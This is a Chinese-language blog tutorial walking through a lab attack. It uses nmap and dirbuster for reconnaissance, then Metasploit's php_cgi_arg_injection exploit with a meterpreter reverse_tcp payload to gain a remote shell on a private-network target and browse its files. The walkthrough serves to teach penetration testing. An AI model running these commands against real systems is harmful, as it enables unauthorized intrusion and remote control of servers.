標籤:webshell 瀏覽器 原始碼 地址欄 share
利用phpMyAdmin漏洞上傳木馬程式,獲得webshell。
CGI指令碼沒有正確處理請求參數,導致原始碼泄露,允許遠程攻擊者在請求參數中插入執行命令。
一、利用nmap工具掃描目標主機
1.1使用nmap命令對目標主機進行掃描。單擊案頭空白處,右鍵菜單選擇“在終端中開啟”。
1.2在終端中輸入命令“nmap –sV 192.168.1.3”,對目標主機進行連接埠掃描,發現開放80連接埠。
650) this.width=650;" src="http://s3.51cto.com/wyfs02/M02/8B/56/wKioL1hKMD3hu9atAAFM_tPfjEs447.jpg" style="float:none;" title="1.jpg" alt="wKioL1hKMD3hu9atAAFM_tPfjEs447.jpg" />
1.3在瀏覽器地址欄中輸入“http:\\192.168.1.3”,訪問目標網站。
二、利用dirbuster掃描目標主機
2.1在終端中輸入命令“dirbuster”,啟動軟體對目標網站進行掃描。
2.2在Target URL處輸入“192.168.1.3”,在File with list of dirs./file處選擇字典檔案(/usr/share/dirbuster/wordlists/目錄下),單擊“Start”按鈕,開始掃描。
650) this.width=650;" src="http://s5.51cto.com/wyfs02/M00/8B/59/wKiom1hKMD6gLgktAAJBXeLhjWk333.jpg" style="float:none;" title="2.jpg" alt="wKiom1hKMD6gLgktAAJBXeLhjWk333.jpg" />
2.3掃描結果顯示包含cgi-bin目錄、phpmyadmin目錄等。
650) this.width=650;" src="http://s5.51cto.com/wyfs02/M00/8B/59/wKiom1hKMD_wFgL3AAEPuvVVb5M587.jpg" style="float:none;" title="3.jpg" alt="wKiom1hKMD_wFgL3AAEPuvVVb5M587.jpg" />
三、利用metasploit攻擊目標主機
3.1在終端中輸入命令“msfconsole”,啟動MSF終端。
3.2在終端中輸入命令“search php_cgi”,搜尋php_cgi的相關工具和攻擊載荷。
3.3在終端中輸入命令“use exploit/multi/http/php_cgi_arg_injection”,啟用漏洞利用模組, 提示符就會提示進入到該路徑下。
650) this.width=650;" src="http://s4.51cto.com/wyfs02/M00/8B/56/wKioL1hKMECSFcp4AABvzLI_vck240.jpg" style="float:none;" title="4.jpg" alt="wKioL1hKMECSFcp4AABvzLI_vck240.jpg" />
3.4在終端中輸入命令“show payloads”,顯示Metasploit中可以在遠程主機執行的代碼,即shellcode。
3.5在終端中輸入命令“set PAYLOAD php/meterpreter/reverse_tcp”,設定使用的shellcode代碼。
3.6在終端中輸入“show options”,顯示攻擊模組需要設定的參數。
3.7在終端中輸入“set LHOST 192.168.1.2”,設定源主機的IP地址,用於會話的反向連結。
3.8在終端中輸入“set RHOST 192.168.1.3”,設定目標主機的IP。
650) this.width=650;" src="http://s4.51cto.com/wyfs02/M01/8B/59/wKiom1hKMECi4_scAAAwLWTM-ZA247.jpg" style="float:none;" title="5.jpg" alt="wKiom1hKMECi4_scAAAwLWTM-ZA247.jpg" />
650) this.width=650;" src="http://s4.51cto.com/wyfs02/M00/8B/56/wKioL1hKMEHBzoNCAAD9EyYlPEg494.jpg" style="float:none;" title="6.jpg" alt="wKioL1hKMEHBzoNCAAD9EyYlPEg494.jpg" />
3.9在終端中輸入“exploit”,開始對目標主機進行攻擊。
650) this.width=650;" src="http://s4.51cto.com/wyfs02/M01/8B/56/wKioL1hKMEKjpkR8AAChA5MMct8360.jpg" style="float:none;" title="7.jpg" alt="wKioL1hKMEKjpkR8AAChA5MMct8360.jpg" />
3.10在終端中輸入“sysinfo”,查看系統內容資訊。
3.11在終端中輸入“ls”,顯示目前的目錄下的檔案內容。
650) this.width=650;" src="http://s3.51cto.com/wyfs02/M01/8B/59/wKiom1hKMEPB9A2KAAEC4hvPO1k940.jpg" style="float:none;" title="8jpg.jpg" alt="wKiom1hKMEPB9A2KAAEC4hvPO1k940.jpg" />
3.12在終端中輸入“cat phpinfo.php”,查看檔案內容。
650) this.width=650;" src="http://s3.51cto.com/wyfs02/M01/8B/56/wKioL1hKMESjVon-AAAWhhmfqs0261.jpg" style="float:none;" title="9.jpg" alt="wKioL1hKMESjVon-AAAWhhmfqs0261.jpg" />
本文出自 “12377962” 部落格,請務必保留此出處http://12387962.blog.51cto.com/12377962/1881881
Metasploit溢出phpMyAdmin漏洞